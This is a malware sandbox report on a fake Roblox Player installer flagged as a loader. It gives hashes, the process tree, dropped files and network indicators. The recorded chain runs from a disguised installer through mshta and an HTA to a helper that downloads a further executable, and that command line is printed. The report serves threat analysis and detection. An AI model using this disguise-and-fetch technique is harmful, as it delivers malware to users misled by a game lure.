File name: Roblox-Player-win10.exe

Full analysis: https://app.any.run/tasks/63b37145-d597-492f-bb7f-fad0bd18460e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 29, 2024, 15:38:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 9F6CFC85691E5369C29C83408B938154
SHA1: 4F6A99703EDCF17745F10BCFF17B13A29BE5EAD5
SHA256: 89A009ED9F444004A3B789D423330275839FEBC20A66C78795AE10C18E238983
SSDEEP: 98304:hzC7cJrQTh1ry9zBWWdHlFP8//h0urXbtP2BD8+T3yH/7EHYMrM87zaGsHCORtHg:igPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Roblox-Player-win10.exe (PID: 1448)
    • Executable content was dropped or overwritten

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)
    • Drops 7-zip archiver for unpacking

      • Roblox-Player-win10.exe (PID: 1448)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 2180)
  • INFO

    • Reads the computer name

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)
    • Checks supported languages

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)
    • Create files in a temporary directory

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)
    • The process uses the downloaded file

      • Roblox-Player-win10.exe (PID: 1448)
      • mshta.exe (PID: 2180)
    • Process checks computer location settings

      • Roblox-Player-win10.exe (PID: 1448)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2180)
    • Checks proxy server information

      • mshta.exe (PID: 2180)
    • Reads the machine GUID from the registry

      • KcRqluY.exe (PID: 5924)
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2009:08:16 11:05:43+00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 9
CodeSize: 48640
InitializedDataSize: 71680
UninitializedDataSize: -
EntryPoint: 0x912e
OSVersion: 5
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 125
Monitored processes: 5
Malicious processes: 0
Suspicious processes: 2

Behavior graph

Process tree shown in the graph (interactive in the full report): start → Roblox-Player-win10.exe → mshta.exe (no specs) → KcRqluY.exe → conhost.exe (no specs); a second Roblox-Player-win10.exe instance (no specs) is also launched.

Process information

PID: 1448
CMD: "C:\Users\admin\Desktop\Roblox-Player-win10.exe"
Path: C:\Users\admin\Desktop\Roblox-Player-win10.exe
Parent process: explorer.exe
User: admin
Integrity Level: HIGH
Modules (images):
c:\users\admin\desktop\roblox-player-win10.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll

PID: 2180
CMD: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\AppData\Local\Temp\RarSFX0\start.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Path: C:\Windows\SysWOW64\mshta.exe
Parent process: Roblox-Player-win10.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft (R) HTML Application host
Version: 11.00.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

PID: 2212
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: KcRqluY.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 3396
CMD: "C:\Users\admin\Desktop\Roblox-Player-win10.exe"
Path: C:\Users\admin\Desktop\Roblox-Player-win10.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540
Modules (images):
c:\users\admin\desktop\roblox-player-win10.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

PID: 5924
CMD: "C:\Users\admin\AppData\Local\Temp\RarSFX0\KcRqluY.exe" -O MwHFadC.exe https://download.yandex.ru/yandex-pack/downloader/downloader.exe
Path: C:\Users\admin\AppData\Local\Temp\RarSFX0\KcRqluY.exe
Parent process: mshta.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules (images):
c:\users\admin\appdata\local\temp\rarsfx0\kcrqluy.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
Total events: 3 433
Read events: 3 428
Write events: 5
Delete events: 0

Modification events

(PID) Process: (1448) Roblox-Player-win10.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hta\OpenWithProgids
Operation: write
Name: htafile
Value:

(PID) Process: (2180) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (2180) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (2180) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:
Executable files: 5
Suspicious files: 1
Text files: 15
Unknown types: 0

Dropped files

PID | Process | Filename | Type

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\7z.exe | executable
MD5: 2D1C72072FEC74FB0ECA850EF8F9F93E
SHA256: B93149E44239DBDD5E6705C73AE14EE11285923E963E41E8D142E4171F20F4EB

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\anim.gif | image
MD5: 7E62AEBA4E8BD8A4D1C5C33F1961DCDB
SHA256: BAD6F9186B0DBA551360CC446EEC00CEB73B244F635BF0D30BECF541E2C3F8CE

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\img\log-game.png | image
MD5: 0FD141306E06EF59CABCE6F76D4F3D7E
SHA256: F19B0E9FEFD718789D8316566AED028B13F43955071F2A4C422EA5C09FBDBEFA

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\gam-page.html | html
MD5: 260AD26EC3790D4097D4E041B8C57C61
SHA256: 1A3DEE4210170A383E74D81014EF04425C52D3123F0757BAFFF49EB752EA8EBD

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\KcRqluY.exe | executable
MD5: E314B40A188DE73B6A16A8197F80EE68
SHA256: D6E2656521CA76AD47AD2C503C9F71B3D00820E8B05275D048F7DEA0C9C30BEB

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\gteb.vbs | text
MD5: 61B247072862E87AA9C44CA21CD0A089
SHA256: 82BBC5E067DFA25D5E7DF3BB1584ED04D9CD3FDFC7A425FE7F55830E76748C86

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\icons.zip | compressed
MD5: 8E19D23C6D6FE77B8DF29A016BC949A9
SHA256: EB569E329EF77A425D7EC5E5CE36D4BEB1659E10DCA76731A863DBAE52DA1EBC

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\icon.png | image
MD5: D26F29F9F1AD2C636C15091FF4B0A372
SHA256: 4ECE660F4319AAC01EBEC9598ED1295FAC9B19EFCFBC4F9CD0437D7F83C77D1F

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\img\master-logo.png | image
MD5: E7AFB5430B81607FB19FA26A999F0EEB
SHA256: CBA188DEF181F039DC7628177161C2179FE2D2C4E4FB6C50815B8E60ECA7D1FA

1448 | Roblox-Player-win10.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\img\logo-offer.png | image
MD5: 072679C20456E6B83EA3707A7C4E7B6F
SHA256: 8A0087C2D38FA04F54E2F8A39310EB6FBDC8849C61A55AE235D4B121052A2E6A
HTTP(S) requests: 3
TCP/UDP connections: 28
DNS requests: 6
Threats: 2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3928 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | DE | binary | 973 b | whitelisted
 | | GET | 302 | 37.9.117.27:443 | https://download.yandex.ru/yandex-pack/downloader/downloader.exe | RU | unknown | | 
 | | GET | 200 | 5.45.200.104:443 | https://cachev2-fra-01.cdn.yandex.net/download.yandex.ru/yandex-pack/downloader/downloader.exe?lid=293 | RU | executable | 203 Kb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3928 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | | | | whitelisted
 | | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3888 | svchost.exe | 239.255.255.250:1900 | | | | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
3928 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5924 | KcRqluY.exe | 5.45.205.243:443 | download.yandex.ru | YANDEX LLC | RU | whitelisted
3928 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5924 | KcRqluY.exe | 5.45.200.104:443 | cachev2-fra-01.cdn.yandex.net | YANDEX LLC | RU | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 172.217.18.110
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
download.yandex.ru
  • 5.45.205.243
  • 5.45.205.245
  • 5.45.205.244
  • 5.45.205.241
  • 5.45.205.242
whitelisted
cachev2-fra-01.cdn.yandex.net
  • 5.45.200.104
whitelisted

Threats

PID | Process | Class | Message
 | | Potentially Bad Traffic | ET INFO Wget Request for Executable
 | | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
No debug info